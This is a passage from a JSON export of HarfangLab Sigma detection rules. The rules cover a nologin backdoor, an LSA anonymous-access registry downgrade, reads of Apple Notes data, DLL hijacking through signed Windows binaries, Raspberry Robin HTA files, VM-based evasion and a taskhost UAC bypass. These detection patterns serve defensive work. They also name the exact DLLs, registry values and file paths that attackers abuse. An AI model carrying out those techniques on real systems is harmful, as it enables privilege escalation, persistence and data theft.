"https://securitylabs.datadoghq.com/articles/analysis-of-teamtnt-doppelganger/",
"https://attack.mitre.org/techniques/T1546/"
],
"name": "t1546_nologin_child_process.yml",
"content": "title: Suspicious Process Launched by Nologin\nid: 46d63e16-d3ad-475f-b398-cc1ad556bf8d\ndescription: |\n Detects the creation of a child process by the nologin binary.\n Attackers may replace the nologin binary by a malicious one while backdooring a machine. Logging in with an account having nologin configured as its shell will trigger the persistence.\n It is recommended to analyze the system to check if the binary has been replaced by a malicious one.\nreferences:\n - https://securitylabs.datadoghq.com/articles/analysis-of-teamtnt-doppelganger/\n - https://attack.mitre.org/techniques/T1546/\ndate: 2024/02/02\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Persistence\nlogsource:\n product: linux\n category: process_creation\ndetection:\n selection:\n ProcessParentImage: '/usr/sbin/nologin'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "46d63e16-d3ad-475f-b398-cc1ad556bf8d",
"rule_name": "Suspicious Process Launched by Nologin",
"rule_description": "Detects the creation of a child process by the nologin binary.\nAttackers may replace the nologin binary by a malicious one while backdooring a machine. Logging in with an account having nologin configured as its shell will trigger the persistence.\nIt is recommended to analyze the system to check if the binary has been replaced by a malicious one.\n",
"rule_creation_date": "2024-02-02",
"rule_modified_date": "2025-03-31",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "47004d03-010a-43e2-bca8-9d97cbce746a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621156Z",
"creation_date": "2026-03-23T11:45:34.621158Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621162Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.blumira.com/integration/how-to-disable-null-session-in-windows/",
"https://attack.mitre.org/techniques/T1112/",
"https://attack.mitre.org/techniques/T1078/"
],
"name": "t1112_lsa_security_lowered_to_include_anonymous_users.yml",
"content": "title: LSA Security Lowered to Include Anonymous Users in Registry\nid: 47004d03-010a-43e2-bca8-9d97cbce746a\ndescription: |\n Detects the modification of the LSA Registry configuration allowing for Null Sessions to be considered as a user from a security perspective.\n Attackers can set this security setting to allow anonymous sessions to inherit from permissions that all named users already have, and possibly perform privilege escalation.\n It is recommended to analyze the process and user session responsible for this registry edit, to look for others signs of suspicious activities on the hosts, and to rollback the security downgrade is this change is not legitimate.\nreferences:\n - https://www.blumira.com/integration/how-to-disable-null-session-in-windows/\n - https://attack.mitre.org/techniques/T1112/\n - https://attack.mitre.org/techniques/T1078/\ndate: 2022/11/28\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1078\n - attack.defense_evasion\n - attack.t1112\n - attack.t1562\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\EveryoneIncludesAnonymous'\n Details|contains: 'DWORD'\n\n filter_zero:\n Details: 'DWORD (0x00000000)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n # This excludes registry modifications coming from local security strategies.\n exclusion_services:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n ProcessUserSID: 'S-1-5-18'\n\n condition: selection and not filter_zero and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "47004d03-010a-43e2-bca8-9d97cbce746a",
"rule_name": "LSA Security Lowered to Include Anonymous Users in Registry",
"rule_description": "Detects the modification of the LSA Registry configuration allowing for Null Sessions to be considered as a user from a security perspective.\nAttackers can set this security setting to allow anonymous sessions to inherit from permissions that all named users already have, and possibly perform privilege escalation.\nIt is recommended to analyze the process and user session responsible for this registry edit, to look for others signs of suspicious activities on the hosts, and to rollback the security downgrade is this change is not legitimate.\n",
"rule_creation_date": "2022-11-28",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1078",
"attack.t1112",
"attack.t1562"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "470243fa-340b-44b2-a367-42a58b4fa7db",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619662Z",
"creation_date": "2026-03-23T11:45:34.619664Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619668Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1005/"
],
"name": "t1005_read_notes.yml",
"content": "title: Suspicious Read Access to Notes Files\nid: 470243fa-340b-44b2-a367-42a58b4fa7db\ndescription: |\n Detects a process reading sensitive files related to the Notes application.\n Adversaries may target user notes on local systems to collect sensitive information.\n It is recommended to check whether the process that accessed the file had legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1005/\ndate: 2024/07/03\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1005\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.SensitiveInformation\n - classification.macOS.Behavior.Collection\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n Kind: 'read'\n Path|startswith:\n - '/Users/*/Library/Group Containers/group.com.apple.notes/'\n - '/Users/*/Library/Containers/com.apple.Notes/Data/Library/Notes/'\n Path|endswith:\n - 'NoteStore.sqlite'\n - 'NoteStore.sqlite-shm'\n - 'NoteStore.sqlite-wal'\n ProcessImage|contains: '?'\n\n filter_notes:\n Image:\n - '/System/Applications/Notes.app/Contents/PlugIns/com.apple.Notes.*'\n - '/System/Applications/Notes.app/Contents/MacOS/Notes'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_security_tools:\n Image: '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n\n ### misc\n exclusion_vscode:\n Image: '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n exclusion_cleanmymac:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.macpaw.CleanMyMac*'\n\n exclusion_bitdefender:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.bitdefender.bddaemon'\n\n exclusion_app_folder:\n ProcessImage|startswith:\n - '/Applications/'\n - '/Library/'\n\n exclusion_rsync:\n - ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.apple.rsync'\n - ProcessImage: '/opt/homebrew/Cellar/rsync/*/bin/rsync'\n\n exclusion_grep:\n - ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.apple.grep'\n - ProcessImage: '/usr/local/Cellar/ripgrep/*/bin/rg'\n\n exclusion_ditto:\n ProcessCommandLine|contains: '/ditto -rsrcFork '\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.apple.ditto'\n\n exclusion_raycast:\n ProcessCommandLine|startswith: 'sqlite3 --json --readonly '\n ProcessGrandparentImage: '/Applications/Raycast.app/Contents/MacOS/Raycast'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "470243fa-340b-44b2-a367-42a58b4fa7db",
"rule_name": "Suspicious Read Access to Notes Files",
"rule_description": "Detects a process reading sensitive files related to the Notes application.\nAdversaries may target user notes on local systems to collect sensitive information.\nIt is recommended to check whether the process that accessed the file had legitimate reasons to do so.\n",
"rule_creation_date": "2024-07-03",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "473427dc-881b-4f08-b432-cd1bd3a57bf2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087134Z",
"creation_date": "2026-03-23T11:45:34.087136Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087141Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_compmgmtlauncher.yml",
"content": "title: DLL Hijacking via compmgmtlauncher.exe\nid: 473427dc-881b-4f08-b432-cd1bd3a57bf2\ndescription: |\n Detects potential Windows DLL Hijacking via compmgmtlauncher.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'compmgmtlauncher.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\apphelp.dll'\n - '\\CLDAPI.dll'\n - '\\CRYPTBASE.dll'\n - '\\cscobj.dll'\n - '\\cscui.dll'\n - '\\edputil.dll'\n - '\\FLTLIB.DLL'\n - '\\ntshrui.dll'\n - '\\PROPSYS.dll'\n - '\\rsaenh.dll'\n - '\\sspicli.dll'\n - '\\twext.dll'\n - '\\windows.storage.dll'\n - '\\windowscodecs.dll'\n - '\\windowsudk.shellcommon.dll'\n - '\\xmllite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "473427dc-881b-4f08-b432-cd1bd3a57bf2",
"rule_name": "DLL Hijacking via compmgmtlauncher.exe",
"rule_description": "Detects potential Windows DLL Hijacking via compmgmtlauncher.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "475e5a2d-b012-4d80-80e8-e5b25fd1d8f4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091389Z",
"creation_date": "2026-03-23T11:45:34.091391Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091395Z",
"rule_level": "high",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://gurucul.com/latest-threats/raspberry-robin-infection-chain-uses-webdav-server/",
"https://x.com/Unit42_Intel/status/1857150852114649216"
],
"name": "t1218_raspberry_robin_hta.yml",
"content": "title: Raspberry Robin Initial Access HTA\nid: 475e5a2d-b012-4d80-80e8-e5b25fd1d8f4\ndescription: |\n Detects when a hta file starting with bytes specific to Raspberry Robin worm is written on the disk\nreferences:\n - https://gurucul.com/latest-threats/raspberry-robin-infection-chain-uses-webdav-server/\n - https://x.com/Unit42_Intel/status/1857150852114649216\ndate: 2025/05/27\nmodified: 2025/06/30\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.execution\n - attack.defense_evasion\n - attack.t1218\n - attack.t1218.005\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\n\nlogsource:\n product: windows\n category: filesystem_write\ndetection:\n selection:\n Path|endswith: '.hta'\n FirstBytes|startswith: '0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a'\n exclusion:\n Path|startswith: '?:\\Program Files (x86)\\Trend Micro\\'\n condition: selection and not 1 of exclusion*\nlevel: high\nconfidence: weak",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "475e5a2d-b012-4d80-80e8-e5b25fd1d8f4",
"rule_name": "Raspberry Robin Initial Access HTA",
"rule_description": "Detects when a hta file starting with bytes specific to Raspberry Robin worm is written on the disk\n",
"rule_creation_date": "2025-05-27",
"rule_modified_date": "2025-06-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1218",
"attack.t1218.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "47690f63-b849-4fc7-acbe-86446b0f9903",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075129Z",
"creation_date": "2026-03-23T11:45:34.075131Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075135Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
"https://attack.mitre.org/techniques/T1564/006/"
],
"name": "t1564_006_susp_virtualbox_headless_windows.yml",
"content": "title: VirtualBox Virtual Machine Started via VBoxHeadless\nid: 47690f63-b849-4fc7-acbe-86446b0f9903\ndescription: |\n Detects the usage of VboxHeadless.exe to start a VM.\n Adversaries may deploy virtual machines to conduct malicious behavior and evade defenses.\n It is recommended to investigate process that spawned VBoxHeadless.exe, and check the legitimacy of the started virtual machine.\nreferences:\n - https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/\n - https://attack.mitre.org/techniques/T1564/006/\ndate: 2024/08/28\nmodified: 2025/01/08\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.006\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Virtualization\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n Image|endswith: '\\VBoxHeadless.exe'\n\n filter_vbox:\n - ParentImage: '?:\\Program Files\\Oracle\\VirtualBox\\VBoxHeadless.exe'\n - GrandparentImage: '?:\\Program Files\\Oracle\\VirtualBox\\VBoxHeadless.exe'\n - ParentImage: '?:\\Program Files\\Oracle\\VirtualBox\\vboxsvc.exe'\n - GrandparentImage: '?:\\Program Files\\Oracle\\VirtualBox\\vboxsvc.exe'\n\n exclusion_ldplayer:\n ProcessParentImage: '.:\\Program Files\\ldplayerbox\\LdVBoxSVC.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "47690f63-b849-4fc7-acbe-86446b0f9903",
"rule_name": "VirtualBox Virtual Machine Started via VBoxHeadless",
"rule_description": "Detects the usage of VboxHeadless.exe to start a VM.\nAdversaries may deploy virtual machines to conduct malicious behavior and evade defenses.\nIt is recommended to investigate process that spawned VBoxHeadless.exe, and check the legitimacy of the started virtual machine.\n",
"rule_creation_date": "2024-08-28",
"rule_modified_date": "2025-01-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1564.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4774d33e-c1c4-480b-85b4-d6487b4d5975",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090600Z",
"creation_date": "2026-03-23T11:45:34.090602Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090606Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_provtool.yml",
"content": "title: DLL Hijacking via provtool.exe\nid: 4774d33e-c1c4-480b-85b4-d6487b4d5975\ndescription: |\n Detects potential Windows DLL Hijacking via provtool.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'provtool'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dmcommandlineutils.dll'\n - '\\msvcp110_win.dll'\n - '\\profapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4774d33e-c1c4-480b-85b4-d6487b4d5975",
"rule_name": "DLL Hijacking via provtool.exe",
"rule_description": "Detects potential Windows DLL Hijacking via provtool.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "478992a5-594c-4509-a88d-bc1d4286c9f3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073685Z",
"creation_date": "2026-03-23T11:45:34.073688Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073693Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/hfiref0x/UACME",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_uac_bypass_taskhost.yml",
"content": "title: UAC Bypass Executed via taskhost\nid: 478992a5-594c-4509-a88d-bc1d4286c9f3\ndescription: |\n Detects the execution of the taskhost.exe UAC bypass, involving the hijacking of the cryptbase.dll DLL.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible for the creation of the DLL as well as to analyze the DLL itself to look for malicious content or actions.\nreferences:\n - https://github.com/hfiref0x/UACME\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2021/01/25\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.002\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image: '?:\\Windows\\taskhost.exe'\n ImageLoaded|endswith: '\\cryptbase.dll'\n\n filter_signed:\n Signed: 'true'\n Signature|contains: 'Microsoft Windows'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "478992a5-594c-4509-a88d-bc1d4286c9f3",
"rule_name": "UAC Bypass Executed via taskhost",
"rule_description": "Detects the execution of the taskhost.exe UAC bypass, involving the hijacking of the cryptbase.dll DLL.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible for the creation of the DLL as well as to analyze the DLL itself to look for malicious content or actions.\n",
"rule_creation_date": "2021-01-25",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
